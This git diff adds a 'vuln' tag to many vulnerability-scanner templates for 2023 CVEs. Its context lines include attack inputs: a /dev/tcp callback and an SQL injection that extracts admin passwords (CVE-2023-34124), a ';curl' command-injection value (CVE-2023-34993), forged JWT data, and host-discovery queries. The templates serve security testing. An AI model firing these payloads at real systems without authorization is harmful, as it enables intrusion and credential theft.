a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 68523f6a141..39d173d6d42 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -31,7 +31,7 @@ info: product: analytics shodan-query: http.favicon.hash:-1381126564 fofa-query: icon_hash=-1381126564 - tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive,vkev + tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive,vkev,vuln variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '" diff --git a/http/cves/2023/CVE-2023-34133.yaml b/http/cves/2023/CVE-2023-34133.yaml index 712ebc483a2..03e415964b0 100644 --- a/http/cves/2023/CVE-2023-34133.yaml +++ b/http/cves/2023/CVE-2023-34133.yaml @@ -30,7 +30,7 @@ info: product: analytics shodan-query: http.favicon.hash:"-1381126564" fofa-query: icon_hash="-1381126564" - tags: cve2023,cve,sonicwall,sqli,injection,vkev + tags: cve2023,cve,sonicwall,sqli,injection,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index c66be59306f..f55400f95ef 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -36,7 +36,7 @@ info: - icon_hash="475145467" - icon_hash="1624375939" - app="zimbra-邮件系统" - tags: cve,cve2023,zimbra,xss,authenticated,kev,vkev + tags: cve,cve2023,zimbra,xss,authenticated,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index cb64fe8d028..4f506dbb208 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -29,7 +29,7 @@ info: product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 fofa-query: icon_hash=-50306417 - tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer + tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index e1d7bd32d85..b6af33e325e 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -31,7 +31,7 @@ info: product: moveit_cloud shodan-query: http.favicon.hash:989289239 fofa-query: icon_hash=989289239 - tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress,vkev + tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress,vkev,vuln variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 8452c2b27d9..65b751b7924 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -35,7 +35,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid + tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index aebeee7ed82..497a62774f3 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -33,7 +33,7 @@ info: - http.favicon.hash:-165631681 - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" - tags: cve2023,cve,gibbon,lfi,gibbonedu,vkev + tags: cve2023,cve,gibbon,lfi,gibbonedu,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index c494e39f4a8..b1cde5a395b 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:-165631681 - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" - tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu + tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 1a52e06383e..d11bed413a0 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember,vkev + tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember,vkev,vuln variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 7482d30cc4b..a27c4ef55ca 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -28,7 +28,7 @@ info: product: jeecg_boot shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,sqli,vkev + tags: cve2023,cve,jeecg,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 4aa75fa68cd..8101fd80451 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based-sqli,cve2023,cve,sqli,bloofox,authenticated + tags: time-based-sqli,cve2023,cve,sqli,bloofox,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index f19b43bf80e..4d52464bd0f 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 239b9c32afc..5559909b5f1 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34754.yaml b/http/cves/2023/CVE-2023-34754.yaml index e770816370a..5a562cf49e2 100644 --- a/http/cves/2023/CVE-2023-34754.yaml +++ b/http/cves/2023/CVE-2023-34754.yaml @@ -26,7 +26,7 @@ info: verified: true vendor: bloofox product: bloofoxcms - tags: time-based-sqli,cve,cve2023,bloofox,sqli,authenticated + tags: time-based-sqli,cve,cve2023,bloofox,sqli,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index d717294c63f..4c289647c09 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index a0c092c0056..b73861f9250 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 8a5d39f67ab..731e864272a 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -34,7 +34,7 @@ info: - title="hestia control panel" - icon_hash=-476299640 google-query: intitle:"hestia control panel" - tags: cve2023,cve,huntr,hestiacp,xss,intrusive + tags: cve2023,cve,huntr,hestiacp,xss,intrusive,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 2058fa8f2de..e621be91484 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -33,7 +33,7 @@ info: - html:"traggo" - http.html:"traggo" fofa-query: body="traggo" - tags: cve2023,cve,traggo,lfi,server + tags: cve2023,cve,traggo,lfi,server,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index c09c7466ba4..7ead3e905cd 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -33,7 +33,7 @@ info: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" - tags: cve,cve2023,packetstorm,chamilo,vkev + tags: cve,cve2023,packetstorm,chamilo,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-34990.yaml b/http/cves/2023/CVE-2023-34990.yaml index eac9be514aa..0c054f77a07 100644 --- a/http/cves/2023/CVE-2023-34990.yaml +++ b/http/cves/2023/CVE-2023-34990.yaml @@ -18,7 +18,7 @@ info: metadata: max-request: 1 shodan-query: title:"FortiWLM Login" - tags: cve,cve2023,fortiwlm,lfi,cisa + tags: cve,cve2023,fortiwlm,lfi,cisa,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 8caa80c8ed8..c606ff38baa 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -36,7 +36,7 @@ info: - body="fortiwlm" - title="fortiwlm" google-query: intitle:"fortiwlm" - tags: cve,cve2023,fortinet,fortiwlm,rce,unauth,vkev + tags: cve,cve2023,fortinet,fortiwlm,rce,unauth,vkev,vuln variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index ac46a7a831e..4f9554dec11 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:362091310 - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" - tags: cve,cve2023,kev,ivanti,mobileiron,epmm,vkev + tags: cve,cve2023,kev,ivanti,mobileiron,epmm,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 5785ef51e61..76f3a44e5aa 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:362091310 - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" - tags: cve2023,cve,ivanti,mobileiron,epmm,kev,vkev + tags: cve2023,cve,ivanti,mobileiron,epmm,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35155.yaml b/http/cves/2023/CVE-2023-35155.yaml index be0adb84dca..9ccf0fc0aa4 100644 --- a/http/cves/2023/CVE-2023-35155.yaml +++ b/http/cves/2023/CVE-2023-35155.yaml @@ -26,7 +26,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35156.yaml b/http/cves/2023/CVE-2023-35156.yaml index 73a2d09a560..85a44497482 100644 --- a/http/cves/2023/CVE-2023-35156.yaml +++ b/http/cves/2023/CVE-2023-35156.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index bb3fa3cbae5..534aee1277a 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -30,7 +30,7 @@ info: - xwiki - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35159.yaml b/http/cves/2023/CVE-2023-35159.yaml index c72809c8273..8534a2e9283 100644 --- a/http/cves/2023/CVE-2023-35159.yaml +++ b/http/cves/2023/CVE-2023-35159.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35160.yaml b/http/cves/2023/CVE-2023-35160.yaml index ded1b78e23a..6ef15913b4c 100644 --- a/http/cves/2023/CVE-2023-35160.yaml +++ b/http/cves/2023/CVE-2023-35160.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 3959b2ae88d..6a21a841a5a 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index b667473ce27..ae16fb9e205 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -31,7 +31,7 @@ info: - xwiki - http.html:"data-xwiki-reference" fofa-query: "body=\"data-xwiki-reference\"" - tags: cve,cve2023,xwiki,xss + tags: cve,cve2023,xwiki,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-3519.yaml b/http/cves/2023/CVE-2023-3519.yaml index 97d9fbfca48..eef30dac0cd 100644 --- a/http/cves/2023/CVE-2023-3519.yaml +++ b/http/cves/2023/CVE-2023-3519.yaml @@ -25,7 +25,7 @@ info: - title="netscaler aaa" - title="citrix gateway" || title:"netscaler gateway" shodan-query: http.title:"citrix gateway" || title:"netscaler gateway" - tags: cve,cve2025,citrix,saml,rce,kev,passive,vkev + tags: cve,cve2025,citrix,saml,rce,kev,passive,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3521.yaml b/http/cves/2023/CVE-2023-3521.yaml index add289fe882..a60f15059fe 100644 --- a/http/cves/2023/CVE-2023-3521.yaml +++ b/http/cves/2023/CVE-2023-3521.yaml @@ -21,7 +21,7 @@ info: max-request: 1 fofa-query: title="FOSSBilling" product: fossbilling - tags: cve2023,cve,fossbilling,xss + tags: cve2023,cve,fossbilling,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3578.yaml b/http/cves/2023/CVE-2023-3578.yaml index da9583c7fb0..393980787fd 100644 --- a/http/cves/2023/CVE-2023-3578.yaml +++ b/http/cves/2023/CVE-2023-3578.yaml @@ -26,7 +26,7 @@ info: product: dedecms shodan-query: http.html:"DedeCms" fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms,ssrf,oast + tags: cve,cve2023,dedecms,ssrf,oast,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index f5fb6af51fc..562a32bd117 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -29,7 +29,7 @@ info: - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" - tags: cve2023,cve,sitecore,rce,vkev + tags: cve2023,cve,sitecore,rce,vkev,vuln variables: string: "{{rand_base(6)}}" payload: | diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 4142d601437..25fd030525a 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -31,7 +31,7 @@ info: product: nocodb shodan-query: http.favicon.hash:-2017596142 fofa-query: icon_hash=-2017596142 - tags: cve2023,cve,nocodb,lfi,vkev + tags: cve2023,cve,nocodb,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index a8f4f7316be..22cb2f640c5 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -37,7 +37,7 @@ info: - http.title:"lightdash" fofa-query: title="lightdash" google-query: intitle:"lightdash" - tags: cve,cve2023,lightdash,lfi,vkev + tags: cve,cve2023,lightdash,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index a14577abd69..4b8fb6f7650 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -37,7 +37,7 @@ info: - icon_hash="151132309" - title="cloudpanel" google-query: intitle:"cloudpanel" - tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload,vkev + tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload,vkev,vuln variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index d089a703a85..a106fc5af5a 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -30,7 +30,7 @@ info: - http.title:"intelbras" fofa-query: title="intelbras" google-query: intitle:"intelbras" - tags: cve2023,cve,intelbras,switch,exposure,vkev + tags: cve2023,cve,intelbras,switch,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index ce43684d9bb..3671c9aac4b 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -29,7 +29,7 @@ info: fofa-query: - "title=\"QloApps\"" - title="qloapps" - tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul + tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 11223c50df1..8fa42757c26 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -28,7 +28,7 @@ info: vendor: webkul product: qloapps fofa-query: title="qloapps" - tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 497db6aa87a..73a1408c983 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -28,7 +28,7 @@ info: vendor: webkul product: qloapps fofa-query: title="qloapps" - tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul,vuln variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index 9297303d4a5..42a4e701b8d 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: adiscon product: loganalyzer - tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer + tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index d3ca5766a08..ac3ce6bd560 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: codekop product: codekop - tags: cve2023,cve,packetstorm,xss,pos,codekop,unauth + tags: cve2023,cve,packetstorm,xss,pos,codekop,unauth,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 69d8693c0bb..4108a1c1b21 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -22,7 +22,7 @@ info: max-request: 2 vendor: codekop product: codekop - tags: cve,cve2023,codekop,pos,auth-bypass + tags: cve,cve2023,codekop,pos,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 9d9d1c98698..50ff5039451 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -30,7 +30,7 @@ info: vendor: juniper product: srx100 shodan-query: title:"Juniper Web Device Manager" - tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev + tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln variables: string: "CVE-2023-36844" payload: "('')" diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 9a56acc624a..b41ae550737 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -32,7 +32,7 @@ info: - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" - tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev,vkev + tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 74481a9454e..b4c8240b60e 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -31,7 +31,7 @@ info: product: moveit_transfer shodan-query: http.favicon.hash:989289239 fofa-query: icon_hash=989289239 - tags: cve,cve2023,moveit,rce,sqli,intrusive,progress,vkev + tags: cve,cve2023,moveit,rce,sqli,intrusive,progress,vkev,vuln variables: session_cookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 54b27cb0f4b..147fb46246b 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -27,7 +27,7 @@ info: product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" fofa-query: body="/main/login.lua?pageid=" - tags: cve2023,cve,honeywell,pm43,printer,iot,rce,vkev + tags: cve2023,cve,honeywell,pm43,printer,iot,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-3722.yaml b/http/cves/2023/CVE-2023-3722.yaml index 9bf6d21d081..ae1305b706e 100644 --- a/http/cves/2023/CVE-2023-3722.yaml +++ b/http/cves/2023/CVE-2023-3722.yaml @@ -24,7 +24,7 @@ info: product: aura_device_services shodan-query: html:"Avaya Aura® Utility Services" fofa-query: body="Avaya Aura® Utility Services" - tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev + tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev,vuln variables: filename: "{{randbase(8)}}" diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 35f5e6b5815..df436c1a2dc 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="/CasaOS-UI/public/index.html" - body="/casaos-ui/public/index.html" - tags: cve,cve2023,oss,casaos,jwt,icewhale + tags: cve,cve2023,oss,casaos,jwt,icewhale,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index dd89dfdbf48..43d257e4460 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -31,7 +31,7 @@ info: fofa-query: - body="/CasaOS-UI/public/index.html" - body="/casaos-ui/public/index.html" - tags: cve2023,cve,oss,casaos,jwt,icewhale + tags: cve2023,cve,oss,casaos,jwt,icewhale,vuln variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' jwt_token: '{{generate_jwt(jwt_data, "HS256")}}' diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 26fc436c558..bac200e87d9 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -34,7 +34,7 @@ info: - icon_hash=540706145 - title="piwigo" google-query: powered by piwigo - tags: cve2023,cve,piwigo,sqli,authenticated + tags: cve2023,cve,piwigo,sqli,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 32a5d76f9e4..acd053b6546 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -32,7 +32,7 @@ info: - xwiki - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve2023,cve,xwiki,rce + tags: cve2023,cve,xwiki,rce,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 7c2cd5b86ee..ef816b4de45 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" - tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project + tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index ef13a8feb37..fb90c9b1837 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:475145467 - http.favicon.hash:"475145467" fofa-query: icon_hash="475145467" - tags: cve2023,cve,zimbra,xss,authenticated,kev,vkev + tags: cve2023,cve,zimbra,xss,authenticated,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-37599.yaml b/http/cves/2023/CVE-2023-37599.yaml index 6e16e8d954c..97873cdc1d7 100644 --- a/http/cves/2023/CVE-2023-37599.yaml +++ b/http/cves/2023/CVE-2023-37599.yaml @@ -28,7 +28,7 @@ info: product: issabel-pbx shodan-query: title:"issabel" fofa-query: title="issabel" - tags: cve,cve2023,issabel,issabel-pbx,directory-listing + tags: cve,cve2023,issabel,issabel-pbx,directory-listing,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index ac30972ab9f..2fcd00b4df9 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system - tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project + tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project,vuln 